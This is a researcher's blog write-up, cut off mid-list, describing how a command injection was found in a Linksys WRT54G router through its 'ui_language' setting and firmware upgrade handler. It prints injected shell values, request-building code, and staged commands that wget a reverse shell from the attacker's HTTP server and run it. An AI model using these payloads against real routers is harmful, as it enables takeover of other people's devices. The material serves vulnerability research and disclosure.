<p><strong>Pwning Home Router - Linksys WRT54G</strong><br />
Elon Gliksberg, 2021-05-30, <a href="https://elongl.github.io/exploitation/2021/05/30/pwning-home-router">https://elongl.github.io/exploitation/2021/05/30/pwning-home-router</a></p>
<p>A Hebrew version is available on <a href="https://www.digitalwhisper.co.il/files/Zines/0x84/DW132-2-WRT54G_vuln.pdf">Digital Whisper</a>.</p>
<h1 id="preface">Preface</h1>
<p>A couple of days ago,
I was looking for a certain cable in one of my drawers when I suddenly stumbled upon a router that was lying around.
Immediately I wondered…<em>Could I hack it?</em></p>
<p><img src="https://i.imgur.com/sAmlLfJ.jpg" alt="Router Image" /></p>
<p style="text-align: center; font-style: italic"><small>"Easy setup" - Perhaps. "Secure"? Not so much.</small></p>
<p>The timing worked well for me because I was just looking for a new project to pick up,
and since I had no prior experience tinkering with such devices, I thought it could be an interesting challenge.</p>
<h1 id="getting-started">Getting Started</h1>
<p>I connected the router to my computer and jumped right into the research.
I started off with a good ol’ port scan in order to get a good grasp of the router’s interfaces and my potential attack vectors.</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>➜ ~ nmap <span class="nt">-F</span> 192.169.1.1
Starting Nmap 7.91 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2021-06-07 21:43 IDT
Nmap scan report <span class="k">for </span>192.169.1.1
Host is up <span class="o">(</span>0.0023s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 99 filtered ports
PORT STATE SERVICE
80/tcp open http
Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>18.20 seconds
</code></pre></div></div>
<p>Unsurprisingly, it looks like all we’ve got to work with is the web server. Off we go then.</p>
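<p>For readers without <code class="language-plaintext highlighter-rouge">nmap</code> at hand, a plain TCP connect scan can be sketched in a few lines of Python. This is only a rough stand-in for the scan above, not what I actually ran: the function name <code class="language-plaintext highlighter-rouge">scan_tcp_ports</code> and the timeout are my own choices for illustration.</p>

```python
import socket
from typing import Iterable, List


def scan_tcp_ports(host: str, ports: Iterable[int], timeout: float = 0.5) -> List[int]:
    """Return the ports on `host` that accept a TCP connection."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.settimeout(timeout)
            # connect_ex returns 0 on success instead of raising an exception.
            if sock.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports
```

<p>Calling <code class="language-plaintext highlighter-rouge">scan_tcp_ports("192.169.1.1", [21, 22, 23, 80, 443])</code> against this router should report only port 80, matching the output above.</p>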
<p>Browsing to the router’s website presents a login prompt.
I authenticated with the default credentials,
and shortly afterwards I was greeted by the following control and management page.</p>
<p><img src="https://i.imgur.com/QJj9iOA.png" alt="Web Interface" /></p>
<p style="text-align: center; font-style: italic"><small>The router's web interface.</small></p>
<h1 id="hacking-time">Hacking Time</h1>
<p>Initially, I searched for potential inputs from the client when I came across the Diagnostics page.
<img src="https://i.imgur.com/QctdaYi.png" alt="Diagnostics Page" /></p>
<p>I thought it could be a good place to apply the oldest blackbox technique in the book - <em>Shell Injection</em>.
Unfortunately, client-side validation was applied.</p>
<center><video style="width: 480px; height: 495px; margin: 1rem" autoplay="" loop=""><source src="https://i.imgur.com/iM8isa8.mp4" /></video></center>
<p>In order to overcome it, I intercepted the request using a proxy.</p>
<center><video style="width: 750px; height: 500px; margin: 1rem" autoplay="" loop=""><source src="https://i.imgur.com/36pK23Z.mp4" /></video></center>
<p>Sadly, it seemed to have no effect at all on the ping request.<br />
Needless to say, I also attempted the same on the Traceroute Test interface and in many other places, but without any luck.</p>
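<p>Instead of an intercepting proxy, the same bypass can be done by crafting the request by hand, since client-side validation never sees it. The sketch below only builds the request and does not send it. The field names <code class="language-plaintext highlighter-rouge">ping_ip</code> and <code class="language-plaintext highlighter-rouge">ping_times</code> and the <code class="language-plaintext highlighter-rouge">apply.cgi</code> endpoint are the ones that show up later in this post; HTTP Basic authentication and the absence of any other form fields are assumptions on my part, so treat it as an illustration rather than a working exploit.</p>

```python
import base64
import urllib.parse
import urllib.request


def build_ping_request(host, ping_ip, ping_times, username, password):
    """Build (but do not send) a POST to apply.cgi with unvalidated fields."""
    # Only the two ping fields are included; any other field the real form
    # requires is deliberately left out because it is not known here.
    body = urllib.parse.urlencode({"ping_ip": ping_ip, "ping_times": ping_times})
    # Assumption: the login prompt is plain HTTP Basic authentication.
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    return urllib.request.Request(
        f"http://{host}/apply.cgi",
        data=body.encode(),
        headers={"Authorization": f"Basic {token}"},
        method="POST",
    )
```

<p>A value such as <code class="language-plaintext highlighter-rouge">127.0.0.1;reboot</code> is encoded into the body as-is, without the browser’s JavaScript ever getting a chance to reject it.</p>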
<h1 id="getting-the-firmware">Getting The Firmware</h1>
<p>At this point I was done with black-box attack variations, mostly because I had no reason to limit myself to them.<br />
I decided to download <a href="https://www.linksys.com/us/support-article?articleNum=148648">the firmware</a>, extract the file system, and begin messing around with what’s available on the router.</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>➜ linksys-wrt54g binwalk <span class="nt">-e</span> FW_WRT54Gv4_4.21.5.000_20120220.bin
DECIMAL HEXADECIMAL DESCRIPTION
<span class="nt">--------------------------------------------------------------------------------</span>
0 0x0 BIN-Header, board ID: W54G, hardware version: 4702, firmware version: 4.21.21, build <span class="nb">date</span>: 2012-02-08
32 0x20 TRX firmware header, little endian, image size: 3362816 bytes, CRC32: 0xE3ABE901, flags: 0x0, version: 1, header size: 28 bytes, loader offset: 0x1C, linux kernel offset: 0xAB0D4, rootfs offset: 0x0
60 0x3C <span class="nb">gzip </span>compressed data, maximum compression, has original file name: <span class="s2">"piggy"</span>, from Unix, last modified: 2012-02-08 03:40:02
700660 0xAB0F4 Squashfs filesystem, little endian, version 2.0, size: 2654572 bytes, 502 inodes, blocksize: 65536 bytes, created: 2012-02-08 03:43:28
➜ linksys-wrt54g <span class="nb">ls </span>_FW_WRT54Gv4_4.21.5.000_20120220.bin.extracted/squashfs-root
bin dev etc lib mnt proc sbin tmp usr var www
</code></pre></div></div>
<p>Intuitively, I started auditing the source code of the web application, because that’s what I could access directly as an attacker.</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>➜ squashfs-root <span class="nb">ls </span>www
Backup_Restore.asp Fail.asp Forward.asp PortTriggerTable.asp SingleForward.asp Success_u_s.asp WEP.asp WanMAC.asp dyndns.asp image it_help tzo.asp
Cysaja.asp Fail_s.asp Forward.asp.bk.asp Port_Services.asp Status_Lan.asp SysInfo.htm WL_ActiveTable.asp Wireless_Advanced.asp en_help index.asp it_lang_pack wlaninfo.htm
DDNS.asp Fail_u_s.asp Log.asp QoS.asp Status_Router.asp SysInfo1.htm WL_FilterTable.asp Wireless_Basic.asp en_lang_pack index_heartbeat.asp sp_help
DHCPTable.asp FilterIPMAC.asp Log_incoming.asp Radius.asp Status_Router1.asp Traceroute.asp WL_WPATable.asp Wireless_MAC.asp fr_help index_l2tp.asp sp_lang_pack
DMZ.asp FilterSummary.asp Log_outgoing.asp RouteTable.asp Status_Wireless.asp Triggering.asp WPA.asp common.js fr_lang_pack index_pppoe.asp style.css
Diagnostics.asp Filters.asp Management.asp Routing.asp Success.asp Upgrade.asp WPA_Preshared.asp de_help google_redirect1.asp index_pptp.asp sw_help
Factory_Defaults.asp Firewall.asp Ping.asp SES_Status.asp Success_s.asp VPN.asp WPA_Radius.asp de_lang_pack google_redirect2.asp index_static.asp sw_lang_pack
</code></pre></div></div>
<p>Basically the web application is a bunch of <code class="language-plaintext highlighter-rouge">.asp</code> pages served through the <code class="language-plaintext highlighter-rouge">httpd</code> that is running.</p>
<p>The first thing I did was inspect <code class="language-plaintext highlighter-rouge">Ping.asp</code> to see how the ping is invoked, since I wanted to know what had foiled my shell injection.
It took me a few minutes to realize that the web application doesn’t perform the ping itself, as I had imagined it would, with something like</p>
<div class="language-cs highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Process</span><span class="p">.</span><span class="nf">Start</span><span class="p">(</span><span class="s">"ping ..."</span><span class="p">);</span>
</code></pre></div></div>
<p>Rather, what actually happens is that it passes the request on to <code class="language-plaintext highlighter-rouge">httpd</code>, which handles it.</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>router-fs<span class="nv">$ </span><span class="nb">grep</span> <span class="nt">-r</span> apply.cgi
www/Wireless_Basic.asp:&lt;FORM <span class="nv">name</span><span class="o">=</span>wireless <span class="nv">onSubmit</span><span class="o">=</span><span class="s2">"return false;"</span> <span class="nv">method</span><span class="o">=</span>&lt;% get_http_method<span class="o">()</span><span class="p">;</span> %&gt; <span class="nv">action</span><span class="o">=</span>apply.cgi&gt;
www/PortTriggerTable.asp:&lt;FORM <span class="nv">name</span><span class="o">=</span>macfilter <span class="nv">method</span><span class="o">=</span>&lt;% get_http_method<span class="o">()</span><span class="p">;</span> %&gt; <span class="nv">action</span><span class="o">=</span>apply.cgi&gt;
www/Traceroute.asp:&lt;FORM <span class="nv">name</span><span class="o">=</span>traceroute <span class="nv">method</span><span class="o">=</span>&lt;% get_http_method<span class="o">()</span><span class="p">;</span> %&gt; <span class="nv">action</span><span class="o">=</span>apply.cgi&gt;
www/WanMAC.asp:&lt;FORM <span class="nv">name</span><span class="o">=</span>mac <span class="nv">method</span><span class="o">=</span>&lt;% get_http_method<span class="o">()</span><span class="p">;</span> %&gt; <span class="nv">action</span><span class="o">=</span>apply.cgi&gt;
www/DMZ.asp:&lt;FORM <span class="nv">name</span><span class="o">=</span>dmz <span class="nv">method</span><span class="o">=</span>&lt;% get_http_method<span class="o">()</span><span class="p">;</span> %&gt; <span class="nv">action</span><span class="o">=</span>apply.cgi&gt;
www/Ping.asp:&lt;FORM <span class="nv">name</span><span class="o">=</span>ping <span class="nv">method</span><span class="o">=</span>&lt;% get_http_method<span class="o">()</span><span class="p">;</span> %&gt; <span class="nv">action</span><span class="o">=</span>apply.cgi&gt;
...
Binary file usr/sbin/httpd matches
</code></pre></div></div>
<p>Indeed, when searching for <code class="language-plaintext highlighter-rouge">/apply.cgi</code>, which is where all the HTTP requests are sent,
the only matches are the <code class="language-plaintext highlighter-rouge">&lt;FORM&gt;</code> elements of the web application and the <code class="language-plaintext highlighter-rouge">httpd</code> binary.</p>
<p>Generally, the sole job of the web application is to pass parameters to the <code class="language-plaintext highlighter-rouge">httpd</code> which actually does the heavy lifting.
I now realized that sooner or later I’d have to reverse the HTTP daemon that is running on the router in order to see how it handles the requests.</p>
<h1 id="analyzing-http-daemon">Analyzing HTTP Daemon</h1>
<p>I opened up Ghidra, filtered the symbol tree to “ping” and found a function called <a href="https://gist.github.com/elongl/8b42ab42fe82c4a456f26a571dd5276d"><code class="language-plaintext highlighter-rouge">ping_server</code></a>.
<img src="https://i.imgur.com/DijAl9t.png" alt="Ghidra ping_server" /></p>
<p>It’s worth mentioning that the binaries in the firmware were stripped and carried no debug symbols.</p>
<p>However, with the great help of Ghidra’s decompiler, inaccurate as it sometimes is, I concluded that the function
eventually calls a function named <code class="language-plaintext highlighter-rouge">_eval</code>, roughly like so.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">_eval</span><span class="p">(</span><span class="s">"ping -c {ping_times} {ping_ip}"</span><span class="p">)</span>
</code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">ping_times</code> and <code class="language-plaintext highlighter-rouge">ping_ip</code> are the arguments supplied from the web page shown above.</p>
<p>Naturally, I went on to see how <code class="language-plaintext highlighter-rouge">_eval</code> handles this input.
To do so, I first had to figure out where the symbol is defined, since it’s an imported symbol that does not reside within <code class="language-plaintext highlighter-rouge">httpd</code> itself.</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>router-fs<span class="nv">$ </span>readelf <span class="nt">-d</span> usr/sbin/httpd
Dynamic section at offset 0x120 contains 27 entries:
Tag Type Name/Value
0x00000001 <span class="o">(</span>NEEDED<span class="o">)</span> Shared library: <span class="o">[</span>libnvram.so]
0x00000001 <span class="o">(</span>NEEDED<span class="o">)</span> Shared library: <span class="o">[</span>libshared.so]
0x00000001 <span class="o">(</span>NEEDED<span class="o">)</span> Shared library: <span class="o">[</span>libcrypto.so]
0x00000001 <span class="o">(</span>NEEDED<span class="o">)</span> Shared library: <span class="o">[</span>libssl.so]
0x00000001 <span class="o">(</span>NEEDED<span class="o">)</span> Shared library: <span class="o">[</span>libexpat.so]
0x00000001 <span class="o">(</span>NEEDED<span class="o">)</span> Shared library: <span class="o">[</span>libc.so.0]
...
router-fs<span class="nv">$ </span>nm <span class="nt">-gD</span> usr/lib/libnvram.so | <span class="nb">grep eval
</span>router-fs<span class="nv">$ </span>nm <span class="nt">-gD</span> usr/lib/libshared.so | <span class="nb">grep eval
</span>0000bd28 T _eval
</code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">_eval</code> is located within <code class="language-plaintext highlighter-rouge">libshared.so</code>.</p>
<p>The <code class="language-plaintext highlighter-rouge">_eval</code> <a href="https://gist.github.com/elongl/cf5badc6d78721cacbe87dfe59afeef5">function itself</a> is relatively long,
but the important part is that it forks and then uses <code class="language-plaintext highlighter-rouge">execvp</code> as opposed to <code class="language-plaintext highlighter-rouge">system</code>.
Therefore, a shell injection is not possible: <code class="language-plaintext highlighter-rouge">execvp</code> does not go through a shell, so the constant <code class="language-plaintext highlighter-rouge">"ping"</code> is the program that will be launched <em>regardless</em> of my other arguments, which are handed to it verbatim.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">_eval</span><span class="p">(</span><span class="kt">char</span> <span class="o">**</span><span class="n">param_1</span><span class="p">,</span><span class="kt">char</span> <span class="o">*</span><span class="n">param_2</span><span class="p">,</span><span class="n">uint</span> <span class="n">param_3</span><span class="p">,</span><span class="n">__pid_t</span> <span class="o">*</span><span class="n">param_4</span><span class="p">)</span>
<span class="p">{</span>
<span class="p">...</span>
<span class="n">__pid</span> <span class="o">=</span> <span class="n">fork</span><span class="p">();</span>
<span class="p">...</span>
<span class="n">setenv</span><span class="p">(</span><span class="s">"PATH"</span><span class="p">,</span><span class="s">"/sbin:/bin:/usr/sbin:/usr/bin"</span><span class="p">,</span><span class="mi">1</span><span class="p">);</span>
<span class="n">alarm</span><span class="p">(</span><span class="n">param_3</span><span class="p">);</span>
<span class="n">execvp</span><span class="p">(</span><span class="o">*</span><span class="n">param_1</span><span class="p">,</span><span class="n">param_1</span><span class="p">);</span>
<span class="n">perror</span><span class="p">(</span><span class="o">*</span><span class="n">param_1</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
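<p>To make the difference concrete, here is a small Python sketch that is not taken from the firmware. Passing a list to <code class="language-plaintext highlighter-rouge">subprocess.run</code> behaves like the <code class="language-plaintext highlighter-rouge">fork</code> + <code class="language-plaintext highlighter-rouge">execvp</code> pattern above, while <code class="language-plaintext highlighter-rouge">shell=True</code> behaves like <code class="language-plaintext highlighter-rouge">system</code>. The <code class="language-plaintext highlighter-rouge">echo</code> payload is just a harmless stand-in for an injected command, and a POSIX system is assumed.</p>

```python
import subprocess

payload = "hello; echo INJECTED"

# Like execvp: the program is fixed and each argument is passed verbatim,
# so ';' is just another character inside argv[1].
argv_style = subprocess.run(
    ["echo", payload], capture_output=True, text=True
).stdout

# Like system(): the whole string is handed to /bin/sh, which treats ';'
# as a command separator and runs the second command too.
shell_style = subprocess.run(
    "echo " + payload, shell=True, capture_output=True, text=True
).stdout

print(repr(argv_style))   # 'hello; echo INJECTED\n'
print(repr(shell_style))  # 'hello\nINJECTED\n'
```

<p>This is why the ping handler is a dead end for shell injection, and why any remaining call that goes through a shell is worth a closer look.</p>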
<p>I tried to see if I could escalate my control via <code class="language-plaintext highlighter-rouge">ping</code> or <code class="language-plaintext highlighter-rouge">traceroute</code> with certain arguments but I didn’t find anything interesting.
I also searched for other references within <code class="language-plaintext highlighter-rouge">httpd</code> to <code class="language-plaintext highlighter-rouge">_eval</code> in the hope that I’d find a place in which the first argument, the program, is user-controlled.<br />
As expected, I couldn’t find such a scenario.</p>
<h1 id="back-to-basics">Back To Basics</h1>
<p>Well, why not at least <em>try</em> to think simpler than that?<br />
Let’s begin by searching for references to <code class="language-plaintext highlighter-rouge">system</code> within <code class="language-plaintext highlighter-rouge">httpd</code>.
<img src="https://i.imgur.com/usejiO7.png" alt="system xrefs" />
There weren’t too many in the first place, and all of them were actually safe, since an attacker had no way to influence the command being run.</p>
<p>With the exception of a <a href="https://gist.github.com/elongl/e9974c91efcec1a0dc04fc9b639b861d">single</a> spot 😮</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">do_upgrade_post</span><span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="n">param_1</span><span class="p">,</span><span class="n">BIO</span> <span class="o">*</span><span class="n">param_2</span><span class="p">,</span><span class="kt">int</span> <span class="n">param_3</span><span class="p">)</span>
<span class="p">{</span>
<span class="p">...</span>
<span class="n">system</span><span class="p">(</span><span class="s">"cp /www/Success_u_s.asp /tmp/."</span><span class="p">);</span>
<span class="n">system</span><span class="p">(</span><span class="s">"cp /www/Fail_u_s.asp /tmp/."</span><span class="p">);</span>
<span class="n">memset</span><span class="p">(</span><span class="n">acStack88</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mh">0x40</span><span class="p">);</span>
<span class="n">puVar1</span> <span class="o">=</span> <span class="p">(</span><span class="n">undefined</span> <span class="o">*</span><span class="p">)</span><span class="n">nvram_get</span><span class="p">(</span><span class="s">"ui_language"</span><span class="p">);</span>
<span class="n">uVar7</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">puVar1</span> <span class="o">==</span> <span class="p">(</span><span class="n">undefined</span> <span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">)</span> <span class="p">{</span>
<span class="n">puVar1</span> <span class="o">=</span> <span class="o">&</span><span class="n">DAT_0047a2b8</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">snprintf</span><span class="p">(</span><span class="n">acStack88</span><span class="p">,</span><span class="mh">0x40</span><span class="p">,</span><span class="s">"cp /www/%s_lang_pack/captmp.js /tmp/."</span><span class="p">,</span><span class="n">puVar1</span><span class="p">);</span>
<span class="n">system</span><span class="p">(</span><span class="n">acStack88</span><span class="p">);</span>
<span class="n">iVar2</span> <span class="o">=</span> <span class="n">memcmp</span><span class="p">(</span><span class="n">param_1</span><span class="p">,</span><span class="s">"restore.cgi"</span><span class="p">,</span><span class="mh">0xb</span><span class="p">);</span>
<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>
<p>You can see that what happens is that a variable called <code class="language-plaintext highlighter-rouge">puVar1</code> is formatted into a <code class="language-plaintext highlighter-rouge">cp</code> command using <code class="language-plaintext highlighter-rouge">snprintf</code>,
and then the command is invoked with <code class="language-plaintext highlighter-rouge">system</code>.</p>
<p>The variable <code class="language-plaintext highlighter-rouge">puVar1</code> is loaded from <code class="language-plaintext highlighter-rouge">nvram_get("ui_language")</code>. NVRAM stands for <em>Non-Volatile RAM</em>, memory whose contents “survive” a reboot.
In this case it holds the language of the user interface, since we don’t want it to change whenever the router restarts.</p>
<p>Luckily for us, we can control this value!</p>
<p><img src="https://i.imgur.com/xrNitIn.png" alt="change ui_language" /></p>
<p>I looked for the place on the web page from which the language can be changed,
inspected the request that was sent, and noted that the <code class="language-plaintext highlighter-rouge">ui_language</code> parameter is indeed what changes,
in my case from <code class="language-plaintext highlighter-rouge">"en"</code> to <code class="language-plaintext highlighter-rouge">"fr"</code>.</p>
<p>Seems like all we have to do is change <code class="language-plaintext highlighter-rouge">ui_language</code> to <code class="language-plaintext highlighter-rouge">;{malicious command};</code> in order to get code execution.
Let’s give it a shot with <code class="language-plaintext highlighter-rouge">;reboot;</code>.</p>
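<p>The effect of such a value on the formatted command can be previewed off-device. The sketch below mimics the <code class="language-plaintext highlighter-rouge">snprintf</code> call from <code class="language-plaintext highlighter-rouge">do_upgrade_post</code> in Python; <code class="language-plaintext highlighter-rouge">build_command</code> is a hypothetical helper of mine, and it assumes plain ASCII input.</p>

```python
FORMAT = "cp /www/%s_lang_pack/captmp.js /tmp/."
BUF_SIZE = 0x40  # size argument passed to snprintf in do_upgrade_post


def build_command(ui_language: str) -> str:
    """Mimic snprintf(buf, 0x40, FORMAT, ui_language) for ASCII input."""
    # snprintf keeps at most BUF_SIZE - 1 characters plus a terminating NUL.
    return (FORMAT % ui_language)[: BUF_SIZE - 1]


print(build_command("en"))        # cp /www/en_lang_pack/captmp.js /tmp/.
print(build_command(";reboot;"))  # cp /www/;reboot;_lang_pack/captmp.js /tmp/.
```

<p>With the second value, the shell invoked by <code class="language-plaintext highlighter-rouge">system</code> would see three commands separated by <code class="language-plaintext highlighter-rouge">;</code>: a broken <code class="language-plaintext highlighter-rouge">cp</code>, then <code class="language-plaintext highlighter-rouge">reboot</code>, then a nonexistent <code class="language-plaintext highlighter-rouge">_lang_pack/captmp.js</code>.</p>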
<center><video style="width: 750px; height: 500px; margin: 1rem" autoplay="" loop=""><source src="https://i.imgur.com/RbcqA2t.mp4" /></video></center>
<p>Well, although it was corrupted, a web page was returned, so we can deduce that the device and the web server are still functional
and didn’t experience any reboot.</p>
<p>At first I thought that maybe I had insufficient permissions to reboot the device (though I highly doubted it, given it’s a router),
or that <code class="language-plaintext highlighter-rouge">reboot</code> was not in the <code class="language-plaintext highlighter-rouge">$PATH</code>.
To rule out both possibilities, I tried pinging myself using an absolute path: <code class="language-plaintext highlighter-rouge">/bin/ping 192.169.1.100</code>.
Still, no luck.</p>
<p>At this point, I revisited the vulnerability and inspected it more closely.<br />
If you paid close attention, you noticed that the vulnerable function’s name is <code class="language-plaintext highlighter-rouge">do_upgrade_post</code>.<br />
This must mean that I have to <strong>issue an upgrade</strong> in order to trigger the bug!</p>
<p>A few things I had to do beforehand:</p>
<ol>
<li>
<p>Because changing the <code class="language-plaintext highlighter-rouge">ui_language</code> to an invalid option corrupts the web page,
I opened up the firmware update page in advance and only switched tabs after changing the language.</p>
</li>
<li>
<p>I also needed to encode the command so that it could be properly used within a URL.</p>
</li>
</ol>
<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">urllib.parse</span>

<span class="n">urllib</span><span class="p">.</span><span class="n">parse</span><span class="p">.</span><span class="n">quote</span><span class="p">(</span><span class="s">';ping -c 4 192.169.1.100;'</span><span class="p">)</span>
<span class="c1"># -> '%3Bping%20-c%204%20192.169.1.100%3B'</span>
</code></pre></div></div>
<ol start="3">
<li>I created an empty file matching <code class="language-plaintext highlighter-rouge">*.bin</code> in order to pass the client-side validation of the firmware filename.</li>
</ol>
<center><iframe style="width: 720px; height: 400px; margin: 0.5rem" src="https://www.youtube.com/embed/-N307W7cd9Y" frameborder="0" allowfullscreen=""></iframe></center>
<p>Yes! We got code execution.</p>
<p>I can only assume that the developers didn’t think this was susceptible to shell injection, since the language
is changed via a dropdown and the interface doesn’t let you provide free text.</p>
<h1 id="interactive-shell">Interactive Shell</h1>
<p>Although executing commands on the router is great, I still lacked an interactive shell, which was my true goal.</p>
<p>To get one, I needed to upload a reverse shell onto the router.<br />
But how could I upload files?
Originally, I thought of writing the file with a command like</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">echo</span> <span class="o">{</span>revshell_bytes<span class="o">}</span> <span class="o">></span> revshell
</code></pre></div></div>
<p>But then I recalled that I couldn’t do so, due to the size limit passed to <code class="language-plaintext highlighter-rouge">snprintf</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Writes at most 0x40 bytes, including the terminating NUL.</span>
<span class="n">snprintf</span><span class="p">(</span><span class="n">acStack88</span><span class="p">,</span><span class="mh">0x40</span><span class="p">,</span><span class="s">"cp /www/%s_lang_pack/captmp.js /tmp/."</span><span class="p">,</span><span class="n">puVar1</span><span class="p">);</span>
<span class="n">system</span><span class="p">(</span><span class="n">acStack88</span><span class="p">);</span>
</code></pre></div></div>
<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">In</span> <span class="p">:</span> <span class="mh">0x40</span> <span class="o">-</span> <span class="mi">1</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="s">'cp /www/'</span><span class="p">)</span>
<span class="n">Out</span><span class="p">:</span> <span class="mi">55</span> <span class="p">(</span><span class="mh">0x37</span><span class="p">)</span>
</code></pre></div></div>
<p>I’m limited to 55 characters (one byte of the buffer goes to the terminating NUL), two of which are the <code class="language-plaintext highlighter-rouge">;</code> at the beginning and at the end, so essentially 53 characters.
Uploading it in chunks with <code class="language-plaintext highlighter-rouge">echo {chunk} >> revshell</code> would take a very long time and I didn’t want to go down that path.</p>
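<p>The length budget is easy to get wrong by one, so here is the arithmetic as a small Python sketch. It counts the terminating NUL that <code class="language-plaintext highlighter-rouge">snprintf</code> always reserves, which makes the budget one character tighter than a plain <code class="language-plaintext highlighter-rouge">0x40 - len('cp /www/')</code>. The helper <code class="language-plaintext highlighter-rouge">fits</code> is hypothetical and only meant for checking payloads before sending them.</p>

```python
BUF_SIZE = 0x40      # size argument passed to snprintf
PREFIX = "cp /www/"  # fixed text emitted before ui_language

# One byte of the buffer is reserved for the terminating NUL.
VALUE_BUDGET = BUF_SIZE - 1 - len(PREFIX)
# The value has the shape ';' + command + ';'.
COMMAND_BUDGET = VALUE_BUDGET - 2


def fits(command: str) -> bool:
    """True if ';command;' survives snprintf without being truncated."""
    return len(command) <= COMMAND_BUDGET


print(VALUE_BUDGET, COMMAND_BUDGET)     # 55 53
print(fits("ping -c 4 192.169.1.100"))  # True
print(fits("echo " + "A" * 60))         # False
```

<p>Anything longer than the budget gets cut off mid-command, including the closing <code class="language-plaintext highlighter-rouge">;</code>, so the leftover format text would be glued onto the payload.</p>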
<p>At this point in time, I realized that <code class="language-plaintext highlighter-rouge">wget</code> is present on the device!<br />
I compiled a <a href="https://github.com/elongl/linksys-wrt54g/blob/master/revshell/revshell.c">reverse shell</a> and set up an HTTP server so that I can pull it to the router.</p>
<p>I automated the process of changing the <code class="language-plaintext highlighter-rouge">ui_language</code> to a command in conjunction with issuing a firmware update in order to execute a shell command.
If everything works correctly, the firmware update request should block since it’s now executing the reverse shell (given that it doesn’t fork).</p>
<p>Steps:</p>
<ol>
<li>Download the reverse shell to the router using <code class="language-plaintext highlighter-rouge">wget</code>.</li>
<li>Make it executable using <code class="language-plaintext highlighter-rouge">chmod +x</code>.</li>
<li>Run it.</li>
</ol>
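<p>The three steps above can be sketched as a list of payloads, each one meant to be set as <code class="language-plaintext highlighter-rouge">ui_language</code> and followed by a firmware upgrade request. The server address, port and file name on the server are made up for illustration, and I am assuming the router’s <code class="language-plaintext highlighter-rouge">wget</code> accepts <code class="language-plaintext highlighter-rouge">-O</code>; this is not the exact automation from my repository.</p>

```python
import urllib.parse

# Hypothetical values: the attacker's HTTP server and the file it serves.
SERVER = "http://192.169.1.100:8000"
REMOTE_PATH = "/tmp/X"

stages = [
    f"wget {SERVER}/X -O {REMOTE_PATH}",  # 1. pull the binary onto the router
    f"chmod +x {REMOTE_PATH}",            # 2. make it executable
    REMOTE_PATH,                          # 3. run it
]


def encode_stage(command: str) -> str:
    """Wrap a command in ';' separators and URL-encode it for the request."""
    return urllib.parse.quote(f";{command};")


for command in stages:
    print(encode_stage(command))
```

<p>Each stage needs its own language change and upgrade request, because only one short command fits in the buffer at a time.</p>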
<center><iframe style="width: 720px; height: 400px; margin: 0.5rem" src="https://www.youtube.com/embed/wmvKFE1XFXw" frameborder="0" allowfullscreen=""></iframe></center>
<p>We can tell that the router attempted to download the binary from our HTTP server, since we received the request.
Sadly, the last firmware upgrade, which should have invoked the reverse shell, clearly returned immediately.
Moreover, we can see that no shell opened up on our handler.</p>
<p>For the sake of assessing whether the file was uploaded successfully, I used the AND (<code class="language-plaintext highlighter-rouge">&&</code>) operator.</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">cat</span> /tmp/X <span class="o">&&</span> ping <span class="nt">-c</span> 1 192.169.1.100
</code></pre></div></div>
<p>If the file were present, I would receive an ICMP packet on my end; otherwise, I wouldn’t.</p>
<p><img src="https://i.imgur.com/gVYDd0U.png" alt="Check Revshell Existence" /></p>
<p>But I did.</p>
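<p>The <code class="language-plaintext highlighter-rouge">&amp;&amp;</code> trick used for this check works as a one-bit side channel: the second command only runs if the first one exits successfully. A local sketch of the same idea follows, with <code class="language-plaintext highlighter-rouge">echo SIGNAL</code> standing in for the ping and a hypothetical helper name; a POSIX shell is assumed.</p>

```python
import shlex
import subprocess


def signal_if_present(path: str) -> str:
    """Run `cat path && echo SIGNAL` in a shell and return its stdout."""
    # `echo SIGNAL` plays the role of the ping: it only runs when cat
    # exits with status 0, i.e. when the file exists and is readable.
    command = f"cat {shlex.quote(path)} >/dev/null 2>&1 && echo SIGNAL"
    result = subprocess.run(command, shell=True, capture_output=True, text=True)
    return result.stdout


print(repr(signal_if_present("/bin/sh")))         # 'SIGNAL\n'
print(repr(signal_if_present("/nonexistent/X")))  # ''
```

<p>Note that this only proves the file exists and can be read; it says nothing about whether its contents are what was intended.</p>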
<p>Well, what is it then? Why wouldn’t it work?</p>
<p>I wanted to be able to get the output of the shell commands that I was running in order to ease the debugging process.
I thought of a couple of ways to do it:</p>
<ol>
<li>Upload a malicious ASP page, <em>Web Shell</em> if you will, and execute commands with the output returned.</li>
